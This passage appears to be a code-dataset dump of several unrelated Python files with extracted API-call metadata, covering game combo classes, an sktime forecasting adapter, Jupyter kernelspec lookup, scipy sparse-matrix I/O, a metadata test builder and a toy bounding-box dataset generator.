core.utility import Array\nfrom core.constants import PlayerForm, SimActKind, MomentType\nfrom core.database import FromDB\n\nif TYPE_CHECKING:\n from entity.player import Player\n\n\nclass Combos:\n def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None:\n self.player = player\n self.actions: Array[Action] = Array()\n for idx, act_id in enumerate(act_ids):\n self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))\n self.ex_actions = None\n if ex_act_ids:\n self.ex_actions: Array[Action] = Array()\n for idx, act_id in enumerate(ex_act_ids):\n if not act_id:\n self.ex_actions.append(None)\n continue\n self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))\n\n def next(self):\n if self.player.current in self.actions:\n try:\n return self.actions[self.player.current.index + 1]\n except IndexError:\n pass\n return self.actions[1]\n\n def __repr__(self) -> str:\n if self.ex_actions:\n return \"->\".join(map(repr, self.actions)) + \"\\tEX[\" + \"->\".join(map(repr, self.ex_actions)) + \"]\"\n return \"->\".join(map(repr, self.actions))\n\n\nclass UniqueCombos(Combos, FromDB, table=\"CharaUniqueCombo\"):\n def __init__(self, id: int, player: Player) -> None:\n FromDB.__init__(self, id)\n act_ids = (self._data[\"_ActionId\"] + i for i in range(self._data[\"_MaxComboNum\"]))\n ex_act_ids = None if not self._data[\"_ExActionId\"] else (self._data[\"_ExActionId\"] + i for i in range(self._data[\"_MaxComboNum\"]))\n Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)\n if self._data[\"_ShiftConditionType\"] == 1:\n self.player.events.listen(MomentType.HIT, self.enable)\n\n def enable(self, *args, **kwargs):\n pass\n\n\nclass DefaultCombos(Combos, FromDB, table=\"WeaponType\"):\n def __init__(self, id: int, player: Player) -> None:\n FromDB.__init__(self, id)\n act_ids = (self._data[f\"_DefaultSkill{i+1:02}\"] for i in range(5) if self._data[f\"_DefaultSkill{i+1:02}\"])\n ex_act_ids = None if not self._data[\"_DefaultSkill05Ex\"] else (0, 0, 0, 0, self._data[\"_DefaultSkill05Ex\"])\n Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)\n\n\nclass DragonCombos(Combos):\n def __init__(self, id: int, combo_max: int, player: Player) -> None:\n act_ids = (id + i for i in range(combo_max))\n Combos.__init__(self, player, PlayerForm.DRG, act_ids)\n"},"apis":{"kind":"list like","value":["core.utility.Array","action.Action","core.database.FromDB.__init__"],"string":"[\n \"core.utility.Array\",\n \"action.Action\",\n \"core.database.FromDB.__init__\"\n]"},"extract_api":{"kind":"string","value":"[((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\\n', (567, 569), False, 'from core.utility import Array\\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\\n', (1704, 1714), False, 'from core.database import FromDB\\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\\n', (2341, 2351), False, 'from core.database import FromDB\\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\\n', (826, 828), False, 'from core.utility import Array\\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\\n', (655, 720), False, 'from action import Action\\n'), 
((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\\n', (1037, 1102), False, 'from action import Action\\n')]"}}},{"rowIdx":771,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python3 -u\n# -*- coding: utf-8 -*-\n\n__author__ = [\"\"]\n__all__ = [\"_StatsModelsAdapter\"]\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.forecasting.base._base import DEFAULT_ALPHA\nfrom sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin\nfrom sktime.forecasting.base._sktime import _SktimeForecaster\n\n\nclass _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster):\n \"\"\"Base class for interfacing statsmodels forecasting algorithms\"\"\"\n\n _fitted_param_names = ()\n\n def __init__(self):\n self._forecaster = None\n self._fitted_forecaster = None\n super(_StatsModelsAdapter, self).__init__()\n\n def fit(self, y, X=None, fh=None):\n \"\"\"Fit to training data.\n\n Parameters\n ----------\n y : pd.Series\n Target time series to which to fit the forecaster.\n fh : int, list or np.array, optional (default=None)\n The forecasters horizon with the steps ahead to to predict.\n X : pd.DataFrame, optional (default=None)\n Exogenous variables are ignored\n Returns\n -------\n self : returns an instance of self.\n \"\"\"\n # statsmodels does not support the pd.Int64Index as required,\n # so we coerce them here to pd.RangeIndex\n if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index:\n y, X = _coerce_int_to_range_index(y, X)\n\n self._set_y_X(y, X)\n self._set_fh(fh)\n self._fit_forecaster(y, X)\n self._is_fitted = True\n return self\n\n def _fit_forecaster(self, y_train, X_train=None):\n \"\"\"Internal fit\"\"\"\n raise NotImplementedError(\"abstract method\")\n\n def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):\n \"\"\"\n Make forecasts.\n\n Parameters\n ----------\n fh : ForecastingHorizon\n The forecasters horizon with the steps ahead to to predict.\n Default is one-step ahead forecast,\n i.e. 
np.array([1])\n X : pd.DataFrame, optional (default=None)\n Exogenous variables are ignored.\n return_pred_int : bool, optional (default=False)\n alpha : int or list, optional (default=0.95)\n\n Returns\n -------\n y_pred : pd.Series\n Returns series of predicted values.\n \"\"\"\n if return_pred_int:\n raise NotImplementedError()\n\n # statsmodels requires zero-based indexing starting at the\n # beginning of the training series when passing integers\n start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]]\n y_pred = self._fitted_forecaster.predict(start, end)\n\n # statsmodels forecasts all periods from start to end of forecasting\n # horizon, but only return given time points in forecasting horizon\n return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()]\n\n def get_fitted_params(self):\n \"\"\"Get fitted parameters\n\n Returns\n -------\n fitted_params : dict\n \"\"\"\n self.check_is_fitted()\n return {\n name: self._fitted_forecaster.params.get(name)\n for name in self._get_fitted_param_names()\n }\n\n def _get_fitted_param_names(self):\n \"\"\"Get names of fitted parameters\"\"\"\n return self._fitted_param_names\n\n\ndef _coerce_int_to_range_index(y, X=None):\n new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1)\n try:\n np.testing.assert_array_equal(y.index, new_index)\n except AssertionError:\n raise ValueError(\n \"Coercion of pd.Int64Index to pd.RangeIndex \"\n \"failed. Please provide `y_train` with a \"\n \"pd.RangeIndex.\"\n )\n y.index = new_index\n if X is not None:\n X.index = new_index\n return y, X\n"},"apis":{"kind":"list like","value":["numpy.testing.assert_array_equal","pandas.RangeIndex"],"string":"[\n \"numpy.testing.assert_array_equal\",\n \"pandas.RangeIndex\"\n]"},"extract_api":{"kind":"string","value":"[((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\\n', (3446, 3475), True, 'import pandas as pd\\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\\n', (3522, 3542), True, 'import numpy as np\\n')]"}}},{"rowIdx":772,"cells":{"code":{"kind":"string","value":"\"\"\"Find kernel specifications for a given language\"\"\"\n\nimport os\nimport sys\n\nfrom .languages import same_language\nfrom .reraise import reraise\n\ntry:\n # I prefer not to take a dependency on jupyter_client\n from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\nexcept ImportError as err:\n find_kernel_specs = reraise(err)\n get_kernel_spec = reraise(err)\n\n\ndef set_kernelspec_from_language(notebook):\n \"\"\"Set the kernel specification based on the 'main_language' metadata\"\"\"\n language = notebook.metadata.get(\"jupytext\", {}).get(\"main_language\")\n if \"kernelspec\" not in notebook.metadata and language:\n try:\n kernelspec = kernelspec_from_language(language)\n except ValueError:\n return\n notebook.metadata[\"kernelspec\"] = kernelspec\n notebook.metadata.get(\"jupytext\", {}).pop(\"main_language\")\n\n\ndef kernelspec_from_language(language):\n \"\"\"Return the python kernel that matches the current env, or the first kernel that matches the given language\"\"\"\n if language == \"python\":\n # Return the kernel that matches the current Python executable\n for name in find_kernel_specs():\n kernel_specs = get_kernel_spec(name)\n cmd = kernel_specs.argv[0]\n if (\n kernel_specs.language == \"python\"\n and os.path.isfile(cmd)\n and os.path.samefile(cmd, sys.executable)\n ):\n 
return {\n \"name\": name,\n \"language\": language,\n \"display_name\": kernel_specs.display_name,\n }\n raise ValueError(\n \"No kernel found that matches the current python executable {}\\n\".format(\n sys.executable\n )\n + \"Install one with 'python -m ipykernel install --name kernel_name [--user]'\"\n )\n\n for name in find_kernel_specs():\n kernel_specs = get_kernel_spec(name)\n if same_language(kernel_specs.language, language):\n return {\n \"name\": name,\n \"language\": language,\n \"display_name\": kernel_specs.display_name,\n }\n\n raise ValueError(\"No kernel found for the language {}\".format(language))\n"},"apis":{"kind":"list like","value":["jupyter_client.kernelspec.find_kernel_specs","jupyter_client.kernelspec.get_kernel_spec","os.path.samefile","os.path.isfile"],"string":"[\n \"jupyter_client.kernelspec.find_kernel_specs\",\n \"jupyter_client.kernelspec.get_kernel_spec\",\n \"os.path.samefile\",\n \"os.path.isfile\"\n]"},"extract_api":{"kind":"string","value":"[((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\\n', (1367, 1372), False, 'import os\\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\\n', (1409, 1430), False, 'import os\\n')]"}}},{"rowIdx":773,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport scipy.sparse\n\n__all__ = ['save_npz', 'load_npz']\n\n\n# Make loading safe vs. malicious input\nPICKLE_KWARGS = dict(allow_pickle=False)\n\n\ndef save_npz(file, matrix, compressed=True):\n \"\"\" Save a sparse matrix to a file using ``.npz`` format.\n\n Parameters\n ----------\n file : str or file-like object\n Either the file name (string) or an open file (file-like object)\n where the data will be saved. If file is a string, the ``.npz``\n extension will be appended to the file name if it is not already\n there.\n matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or coo``)\n The sparse matrix to save.\n compressed : bool, optional\n Allow compressing the file. 
Default: True\n\n See Also\n --------\n scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format.\n numpy.savez: Save several arrays into a ``.npz`` archive.\n numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive.\n\n Examples\n --------\n Store sparse matrix to disk, and load it again:\n\n >>> import scipy.sparse\n >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n\n >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)\n >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')\n\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n \"\"\"\n arrays_dict = {}\n if matrix.format in ('csc', 'csr', 'bsr'):\n arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)\n elif matrix.format == 'dia':\n arrays_dict.update(offsets=matrix.offsets)\n elif matrix.format == 'coo':\n arrays_dict.update(row=matrix.row, col=matrix.col)\n else:\n raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format))\n arrays_dict.update(\n format=matrix.format.encode('ascii'),\n shape=matrix.shape,\n data=matrix.data\n )\n if compressed:\n np.savez_compressed(file, **arrays_dict)\n else:\n np.savez(file, **arrays_dict)\n\n\ndef load_npz(file):\n \"\"\" Load a sparse matrix from a file using ``.npz`` format.\n\n Parameters\n ----------\n file : str or file-like object\n Either the file name (string) or an open file (file-like object)\n where the data will be loaded.\n\n Returns\n -------\n result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix\n A sparse matrix containing the loaded data.\n\n Raises\n ------\n OSError\n If the input file does not exist or cannot be read.\n\n See Also\n --------\n scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format.\n numpy.load: Load several arrays from a ``.npz`` archive.\n\n Examples\n --------\n Store sparse matrix to disk, and load it again:\n\n >>> import scipy.sparse\n >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n\n >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)\n >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')\n\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n \"\"\"\n\n with np.load(file, **PICKLE_KWARGS) as loaded:\n try:\n matrix_format = loaded['format']\n except KeyError as e:\n raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e\n\n matrix_format = matrix_format.item()\n\n if not isinstance(matrix_format, str):\n # Play safe with Python 2 vs 3 backward compatibility;\n # files saved with SciPy < 1.0.0 may contain unicode or bytes.\n matrix_format = matrix_format.decode('ascii')\n\n try:\n cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format))\n except AttributeError as e:\n raise ValueError('Unknown matrix format 
\"{}\"'.format(matrix_format)) from e\n\n if matrix_format in ('csc', 'csr', 'bsr'):\n return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])\n elif matrix_format == 'dia':\n return cls((loaded['data'], loaded['offsets']), shape=loaded['shape'])\n elif matrix_format == 'coo':\n return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape'])\n else:\n raise NotImplementedError('Load is not implemented for '\n 'sparse matrix of format {}.'.format(matrix_format))\n"},"apis":{"kind":"list like","value":["numpy.savez_compressed","numpy.load","numpy.savez"],"string":"[\n \"numpy.savez_compressed\",\n \"numpy.load\",\n \"numpy.savez\"\n]"},"extract_api":{"kind":"string","value":"[((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\\n', (2445, 2466), True, 'import numpy as np\\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\\n', (2493, 2514), True, 'import numpy as np\\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\\n', (4025, 4048), True, 'import numpy as np\\n')]"}}},{"rowIdx":774,"cells":{"code":{"kind":"string","value":"# Copyright 2022 Collate\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nTestCase builder\n\"\"\"\n\nfrom metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest\nfrom metadata.generated.schema.tests.table import tableRowCountToEqual\nfrom metadata.generated.schema.tests.tableTest import TableTestType\nfrom metadata.great_expectations.builders.table.base_table_test_builders import (\n BaseTableTestBuilder,\n)\n\n\nclass TableRowCountToEqualBuilder(BaseTableTestBuilder):\n \"\"\"Builder for `expect_table_row_count_to_equal` GE expectation\"\"\"\n\n def _build_test(self) -> CreateTableTestRequest:\n \"\"\"Specific test builder for the test\"\"\"\n return self.build_test_request(\n config=tableRowCountToEqual.TableRowCountToEqual(\n value=self.result[\"expectation_config\"][\"kwargs\"][\"value\"],\n ),\n test_type=TableTestType.tableRowCountToEqual,\n )\n"},"apis":{"kind":"list like","value":["metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual"],"string":"[\n \"metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual\"\n]"},"extract_api":{"kind":"string","value":"[((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': \"self.result['expectation_config']['kwargs']['value']\"}), \"(value=self.result[\\n 'expectation_config']['kwargs']['value'])\\n\", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\\n')]"}}},{"rowIdx":775,"cells":{"code":{"kind":"string","value":"'''\nThis code is based on https://github.com/jrieke/shape-detection/\n'''\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport tensorflow as tf\nimport datetime\n\nclass JriekeBboxDataset:\n def 
generate(self):\n print('Generating...')\n\n self.WIDTH = 8\n self.HEIGHT = 8\n num_imgs = 50000\n min_object_size = 1\n max_object_size = 4\n num_objects = 1\n\n self.bboxes = np.zeros((num_imgs, num_objects, 4))\n self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT)) # set background to 0\n\n for i_img in range(num_imgs):\n for i_object in range(num_objects):\n w, h = np.random.randint(min_object_size, max_object_size, size=2)\n x = np.random.randint(0, self.WIDTH - w)\n y = np.random.randint(0, self.HEIGHT - h)\n self.imgs[i_img, y:y+h, x:x+w] = 1. # set rectangle to 1\n self.bboxes[i_img, i_object] = [x, y, w, h]\n\n print(\"Shapes: imgs \", self.imgs.shape, \" bboxes \", self.bboxes.shape)\n\n #why this?\n # X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs)\n X = self.imgs\n\n y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH\n\n # Split training and test.\n i = int(0.8 * num_imgs)\n train_X = X[:i] #80% for training\n test_X = X[i:]\n train_y = y[:i]\n test_y = y[i:]\n self.test_imgs = self.imgs[i:]\n self.test_bboxes = self.bboxes[i:]\n\n return train_X, train_y, test_X, test_y\n\n def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):\n fig = plt.figure(figsize=(12, 3))\n fig.suptitle('check if the generated imgs match to the test_X slice image')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 2, 1)\n plt.gca().set_title('Returned by the dataset class: used for training')\n plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n\n plt.subplot(1, 2, 2)\n plt.gca().set_title('Global image holder: used for plotting.')\n plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n plt.show()\n print('compare:',TMP,test_imgs_sample)\n\n def IOU(self,bbox1, bbox2):\n '''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity'''\n x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3]\n x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3]\n\n w_I = min(x1 + w1, x2 + w2) - max(x1, x2)\n h_I = min(y1 + h1, y2 + h2) - max(y1, y2)\n if w_I <= 0 or h_I <= 0: # no overlap\n return 0.\n I = w_I * h_I\n\n U = w1 * h1 + w2 * h2 - I\n\n return I / U\n\n def convertDefaultAnnotToCoord(self, annot):\n '''\n annot -> [x, y, w, h]\n '''\n\n w = annot[2] * self.WIDTH\n h = annot[3] * self.HEIGHT\n\n x = annot[0] * self.HEIGHT\n y = annot[1] * self.HEIGHT\n\n return [x,y,w,h]\n\n def convertYoloAnnotToCoord(self, yolo_annot):\n '''\n yolo_annot -> [x, y, w, h]\n '''\n\n w = yolo_annot[2] * self.WIDTH\n h = yolo_annot[3] * self.HEIGHT\n\n x = (yolo_annot[0] * self.WIDTH) - (w/2)\n y = (yolo_annot[1] * self.HEIGHT) - (h/2)\n\n return [x,y,w,h]\n\n def show_generated(self, i=0):\n fig = plt.figure()\n fig.subplots_adjust(top=0.85)\n fig.suptitle('Generated image sample + GT')\n plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n for bbox in self.bboxes[i]:\n plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))\n plt.gca().legend(['GT'])\n plt.show()\n\n def plot_rectangle(self, img, bbox):\n\n fig = plt.figure()\n fig.suptitle('Plotting rectangle.')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 1, 1)\n plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n 
plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))\n plt.show()\n\n def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):\n fig = plt.figure(figsize=(12, 3))\n fig.suptitle('check if the generated imgs match to the test_X slice image')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 2, 1)\n plt.gca().set_title('Returned by the dataset class: used for training')\n plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n\n plt.subplot(1, 2, 2)\n plt.gca().set_title('Global image holder: used for plotting.')\n plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n plt.show()\n print('compare:',test_X_sample,test_imgs_sample)\n\n def show_predicted(self, pred_bboxes):\n # Show a few images and predicted bounding boxes from the test dataset.\n\n fig = plt.figure(figsize=(12, 3))\n fig.subplots_adjust(top=0.85)\n fig.suptitle('Prediction demonstration. Random samples.')\n legend_plotted = False\n\n for i_subplot in range(1, 11):\n plt.subplot(1, 10, i_subplot)\n i = np.random.randint(len(pred_bboxes))\n plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]):\n # print('before convertion: pred',pred_bbox, 'gt',exp_bbox)\n pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox)\n # exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox)\n print('after convertion: pred',pred_bbox, 'gt',exp_bbox)\n plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none'))\n #gt\n plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none'))\n plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r')\n if not legend_plotted:\n legend_plotted = True\n plt.gca().legend(['Pred','GT'],loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True)\n plt.show()\n # plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.imshow","matplotlib.patches.Rectangle","matplotlib.pyplot.gca","numpy.zeros","matplotlib.pyplot.figure","numpy.random.randint","matplotlib.pyplot.subplot","matplotlib.pyplot.show"],"string":"[\n \"matplotlib.pyplot.imshow\",\n \"matplotlib.patches.Rectangle\",\n \"matplotlib.pyplot.gca\",\n \"numpy.zeros\",\n \"matplotlib.pyplot.figure\",\n \"numpy.random.randint\",\n \"matplotlib.pyplot.subplot\",\n \"matplotlib.pyplot.show\"\n]"},"extract_api":{"kind":"string","value":"[((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\\n', (448, 476), True, 'import numpy as np\\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\\n', (505, 542), True, 'import numpy as np\\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\\n'), ((1930, 2052), 
'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_X_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (1940, 2052), True, 'import matplotlib.pyplot as plt\\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_imgs_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (2167, 2282), True, 'import matplotlib.pyplot as plt\\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\\n extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (3636, 3746), True, 'import matplotlib.pyplot as plt\\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(img, cmap='Greys', interpolation='none', origin='lower', extent=\\n [0, self.WIDTH, 0, self.HEIGHT])\\n\", (4154, 4256), True, 'import matplotlib.pyplot as plt\\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_X_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (4759, 